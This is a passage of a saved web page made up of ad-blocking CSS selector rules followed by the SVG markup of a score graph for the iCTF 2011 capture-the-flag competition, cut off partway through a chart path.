nner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style> + +<body> +<div id="container" style="width: 100%; height: 100%; margin: 0 auto"><div class="highcharts-container" id="highcharts-180" style="position: relative; overflow-x: hidden; overflow-y: hidden; width: 688px; height: 400px; text-align: left; font-family: 'Lucida Grande', 'Lucida Sans Unicode', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; "><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="688" height="400"><defs><lineargradient id="highcharts-181" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="50"><stop offset="0" stop-color="rgb(96,96,96)" stop-opacity="0.8"></stop><stop offset="1" stop-color="rgb(16,16,16)" stop-opacity="0.8"></stop></lineargradient><lineargradient id="highcharts-182" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="400"><stop offset="0" stop-color="rgb(62,84,130)" stop-opacity="1"></stop><stop offset="1" stop-color="rgb(16, 16, 20)" stop-opacity="1"></stop></lineargradient><lineargradient id="highcharts-183" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="20"><stop offset="0.4" stop-color="#606060" stop-opacity="1"></stop><stop offset="0.6" stop-color="#333333" stop-opacity="1"></stop></lineargradient><lineargradient id="highcharts-184" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="20"><stop offset="0.4" stop-color="#606060" stop-opacity="1"></stop><stop offset="0.6" stop-color="#333333" stop-opacity="1"></stop></lineargradient><clippath id="highcharts-185"><rect rx="0" ry="0" fill="none" x="0" y="0" width="399" height="296" stroke-width="0.000001"></rect></clippath></defs><rect rx="15" ry="15" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-182)" x="0" y="0" width="688" height="400" stroke-width="0.000001" stroke="#4572A7"></rect><text x="324" y="25" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:16px;color:#FFF;font:16px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#FFF;" text-anchor="middle" class="highcharts-title" zIndex="1"><tspan x="324">iCTF 2011 Score</tspan></text><text x="324" y="40" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#DDD;font:12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#DDD;" text-anchor="middle" class="highcharts-subtitle" zIndex="1"><tspan x="324">http://ictf2011.info</tspan></text><g class="highcharts-grid" zIndex="1"></g><g class="highcharts-grid" zIndex="1"><path d="M 75 351.5 L 474 351.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 309.5 L 474 309.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 266.5 L 474 266.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 224.5 L 474 224.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 182.5 L 474 182.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 140.5 L 474 140.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 97.5 L 474 97.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path><path d="M 75 55.5 L 474 55.5" fill="none" stroke-opacity="0.1" stroke="rgb(255,255,255)" stroke-width="1" zIndex="1"></path></g><g class="highcharts-series-group" zIndex="3"><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.29607830857194 L 175.79233511586455 252.42512790857194 L 177.76797385620918 252.42512790857194 L 179.74361259655382 252.42512790857194 L 181.71925133689842 252.42512790857194 L 183.69489007724306 252.42512790857194 L 185.67052881758767 251.66171177142908 L 187.6461675579323 250.58636012190482 L 189.6218062982769 249.66792568381032 L 191.59744503862154 247.8407768838103 L 193.57308377896615 246.76382063238174 L 195.5487225193108 245.49141304381067 L 197.52436125965542 243.22067469714472 L 199.50000000000003 240.62913549714472 L 201.47563874034466 237.07079264000186 L 203.45127748068927 234.76142432000188 L 205.4269162210339 232.557837942859 L 207.4025549613785 231.01424022857327 L 209.37819370172315 230.02149795047728 L 211.35383244206778 227.29883920762012 L 213.3294711824124 224.97638937904867 L 215.30510992275703 220.81527212190582 L 217.28074866310163 218.81052332190583 L 219.25638740344627 215.28957795047728 L 221.23202614379088 214.32932012190582 L 223.2076648841355 211.7686325790487 L 225.18330362448012 209.93235006476297 L 227.15894236482475 207.77176995047728 L 229.1345811051694 205.2708574933344 L 231.110219845514 203.6382568076201 L 233.08585858585863 201.44296857904868 L 235.06149732620324 200.10335715047728 L 237.03713606654787 199.01160428190582 L 239.01277480689248 199.01160428190582 L 240.98841354723712 198.43320505904887 L 242.96405228758175 197.69702768762028 L 244.93969102792636 195.97801980952494 L 246.915329768271 195.18307544381065 L 248.8909685086156 195.18307544381065 L 250.86660724896024 195.18307544381065 L 252.84224598930484 195.18307544381065 L 254.81788472964945 195.18307544381065 L 256.79352346999406 195.18307544381065 L 258.7691622103387 195.18307544381065 L 260.7448009506833 195.18307544381065 L 262.72043969102793 194.4906993066678 L 264.69607843137254 193.63136225523925 L 266.6717171717172 192.76221886476281 L 268.6473559120618 192.5944855314296 L 270.6229946524064 192.33164880762007 L 272.598633392751 191.77643737904867 L 274.5742721330957 191.39257273904872 L 276.5499108734403 189.08710710857213 L 278.5255496137849 184.33417590857212 L 280.50118835412957 179.33639012571464 L 282.4768270944742 178.88315492571462 L 284.4524658348188 178.88315492571462 L 286.4281045751634 178.88315492571462 L 288.40374331550805 178.88315492571462 L 290.37938205585266 178.88315492571462 L 292.35502079619727 178.88315492571462 L 294.33065953654193 178.88315492571462 L 296.30629827688654 178.88315492571462 L 298.28193701723114 178.88315492571462 L 300.25757575757575 178.88315492571462 L 302.2332144979204 178.88315492571462 L 304.208853238265 177.1467850971432 L 306.1844919786096 173.06024856380895 L 308.1601307189543 171.4390142780947 L 310.1357694592989 170.25361039238038 L 312.1114081996435 170.25361039238038 L 314.0870469399881 170.09957311999966 L 316.0626856803328 170.09957311999966 L 318.0383244206774 170.09957311999966 L 320.013963161022 170.09957311999966 L 321.98960190136665 170.09957311999966 L 323.96524064171126 170.09957311999966 L 325.94087938205587 170.09957311999966 L 327.9165181224005 169.15377700571395 L 329.89215686274514 167.15902454857113 L 331.86779560308975 165.98574820571397 L 333.84343434343435 164.51450980571397 L 335.81907308377896 161.6356645485711 L 337.7947118241236 160.45624831999967 L 339.77035056446823 159.91534975999966 L 341.74598930481284 159.1636044799995 L 343.7216280451575 154.9928460799995 L 345.6972667855021 154.34105407999948 L 347.6729055258467 152.28363419428518 L 349.6485442661913 150.20789613714234 L 351.624183006536 149.45157385142804 L 353.5998217468806 149.02352233142804 L 355.5754604872252 149.02352233142804 L 357.55109922756986 149.02352233142804 L 359.52673796791447 149.02352233142804 L 361.5023767082591 148.22896530285664 L 363.4780154486037 147.51893234285595 L 365.45365418894835 146.51879062857023 L 367.42929292929296 139.01554582857023 L 369.40493166963756 131.1252345142845 L 371.3805704099822 123.48944937142736 L 373.35620915032683 122.44409577142736 L 375.33184789067144 114.18356457142735 L 377.30748663101605 105.49689485714163 L 379.2831253713607 97.95655702857024 L 381.2587641117053 92.33018902857023 L 383.2344028520499 88.56856013714165 L 385.2100415923946 81.59222916571309 L 387.1856803327392 73.9680133942845 L 389.1613190730838 67.28380905142737 L 391.1369578134284 60.21492310857022 L 393.1125965537731 55.53465567999879 L 395.0882352941177 50.8868738285702" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.29607830857194 L 175.79233511586455 252.42512790857194 L 177.76797385620918 252.42512790857194 L 179.74361259655382 252.42512790857194 L 181.71925133689842 252.42512790857194 L 183.69489007724306 252.42512790857194 L 185.67052881758767 251.66171177142908 L 187.6461675579323 250.58636012190482 L 189.6218062982769 249.66792568381032 L 191.59744503862154 247.8407768838103 L 193.57308377896615 246.76382063238174 L 195.5487225193108 245.49141304381067 L 197.52436125965542 243.22067469714472 L 199.50000000000003 240.62913549714472 L 201.47563874034466 237.07079264000186 L 203.45127748068927 234.76142432000188 L 205.4269162210339 232.557837942859 L 207.4025549613785 231.01424022857327 L 209.37819370172315 230.02149795047728 L 211.35383244206778 227.29883920762012 L 213.3294711824124 224.97638937904867 L 215.30510992275703 220.81527212190582 L 217.28074866310163 218.81052332190583 L 219.25638740344627 215.28957795047728 L 221.23202614379088 214.32932012190582 L 223.2076648841355 211.7686325790487 L 225.18330362448012 209.93235006476297 L 227.15894236482475 207.77176995047728 L 229.1345811051694 205.2708574933344 L 231.110219845514 203.6382568076201 L 233.08585858585863 201.44296857904868 L 235.06149732620324 200.10335715047728 L 237.03713606654787 199.01160428190582 L 239.01277480689248 199.01160428190582 L 240.98841354723712 198.43320505904887 L 242.96405228758175 197.69702768762028 L 244.93969102792636 195.97801980952494 L 246.915329768271 195.18307544381065 L 248.8909685086156 195.18307544381065 L 250.86660724896024 195.18307544381065 L 252.84224598930484 195.18307544381065 L 254.81788472964945 195.18307544381065 L 256.79352346999406 195.18307544381065 L 258.7691622103387 195.18307544381065 L 260.7448009506833 195.18307544381065 L 262.72043969102793 194.4906993066678 L 264.69607843137254 193.63136225523925 L 266.6717171717172 192.76221886476281 L 268.6473559120618 192.5944855314296 L 270.6229946524064 192.33164880762007 L 272.598633392751 191.77643737904867 L 274.5742721330957 191.39257273904872 L 276.5499108734403 189.08710710857213 L 278.5255496137849 184.33417590857212 L 280.50118835412957 179.33639012571464 L 282.4768270944742 178.88315492571462 L 284.4524658348188 178.88315492571462 L 286.4281045751634 178.88315492571462 L 288.40374331550805 178.88315492571462 L 290.37938205585266 178.88315492571462 L 292.35502079619727 178.88315492571462 L 294.33065953654193 178.88315492571462 L 296.30629827688654 178.88315492571462 L 298.28193701723114 178.88315492571462 L 300.25757575757575 178.88315492571462 L 302.2332144979204 178.88315492571462 L 304.208853238265 177.1467850971432 L 306.1844919786096 173.06024856380895 L 308.1601307189543 171.4390142780947 L 310.1357694592989 170.25361039238038 L 312.1114081996435 170.25361039238038 L 314.0870469399881 170.09957311999966 L 316.0626856803328 170.09957311999966 L 318.0383244206774 170.09957311999966 L 320.013963161022 170.09957311999966 L 321.98960190136665 170.09957311999966 L 323.96524064171126 170.09957311999966 L 325.94087938205587 170.09957311999966 L 327.9165181224005 169.15377700571395 L 329.89215686274514 167.15902454857113 L 331.86779560308975 165.98574820571397 L 333.84343434343435 164.51450980571397 L 335.81907308377896 161.6356645485711 L 337.7947118241236 160.45624831999967 L 339.77035056446823 159.91534975999966 L 341.74598930481284 159.1636044799995 L 343.7216280451575 154.9928460799995 L 345.6972667855021 154.34105407999948 L 347.6729055258467 152.28363419428518 L 349.6485442661913 150.20789613714234 L 351.624183006536 149.45157385142804 L 353.5998217468806 149.02352233142804 L 355.5754604872252 149.02352233142804 L 357.55109922756986 149.02352233142804 L 359.52673796791447 149.02352233142804 L 361.5023767082591 148.22896530285664 L 363.4780154486037 147.51893234285595 L 365.45365418894835 146.51879062857023 L 367.42929292929296 139.01554582857023 L 369.40493166963756 131.1252345142845 L 371.3805704099822 123.48944937142736 L 373.35620915032683 122.44409577142736 L 375.33184789067144 114.18356457142735 L 377.30748663101605 105.49689485714163 L 379.2831253713607 97.95655702857024 L 381.2587641117053 92.33018902857023 L 383.2344028520499 88.56856013714165 L 385.2100415923946 81.59222916571309 L 387.1856803327392 73.9680133942845 L 389.1613190730838 67.28380905142737 L 391.1369578134284 60.21492310857022 L 393.1125965537731 55.53465567999879 L 395.0882352941177 50.8868738285702" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.29607830857194 L 175.79233511586455 252.42512790857194 L 177.76797385620918 252.42512790857194 L 179.74361259655382 252.42512790857194 L 181.71925133689842 252.42512790857194 L 183.69489007724306 252.42512790857194 L 185.67052881758767 251.66171177142908 L 187.6461675579323 250.58636012190482 L 189.6218062982769 249.66792568381032 L 191.59744503862154 247.8407768838103 L 193.57308377896615 246.76382063238174 L 195.5487225193108 245.49141304381067 L 197.52436125965542 243.22067469714472 L 199.50000000000003 240.62913549714472 L 201.47563874034466 237.07079264000186 L 203.45127748068927 234.76142432000188 L 205.4269162210339 232.557837942859 L 207.4025549613785 231.01424022857327 L 209.37819370172315 230.02149795047728 L 211.35383244206778 227.29883920762012 L 213.3294711824124 224.97638937904867 L 215.30510992275703 220.81527212190582 L 217.28074866310163 218.81052332190583 L 219.25638740344627 215.28957795047728 L 221.23202614379088 214.32932012190582 L 223.2076648841355 211.7686325790487 L 225.18330362448012 209.93235006476297 L 227.15894236482475 207.77176995047728 L 229.1345811051694 205.2708574933344 L 231.110219845514 203.6382568076201 L 233.08585858585863 201.44296857904868 L 235.06149732620324 200.10335715047728 L 237.03713606654787 199.01160428190582 L 239.01277480689248 199.01160428190582 L 240.98841354723712 198.43320505904887 L 242.96405228758175 197.69702768762028 L 244.93969102792636 195.97801980952494 L 246.915329768271 195.18307544381065 L 248.8909685086156 195.18307544381065 L 250.86660724896024 195.18307544381065 L 252.84224598930484 195.18307544381065 L 254.81788472964945 195.18307544381065 L 256.79352346999406 195.18307544381065 L 258.7691622103387 195.18307544381065 L 260.7448009506833 195.18307544381065 L 262.72043969102793 194.4906993066678 L 264.69607843137254 193.63136225523925 L 266.6717171717172 192.76221886476281 L 268.6473559120618 192.5944855314296 L 270.6229946524064 192.33164880762007 L 272.598633392751 191.77643737904867 L 274.5742721330957 191.39257273904872 L 276.5499108734403 189.08710710857213 L 278.5255496137849 184.33417590857212 L 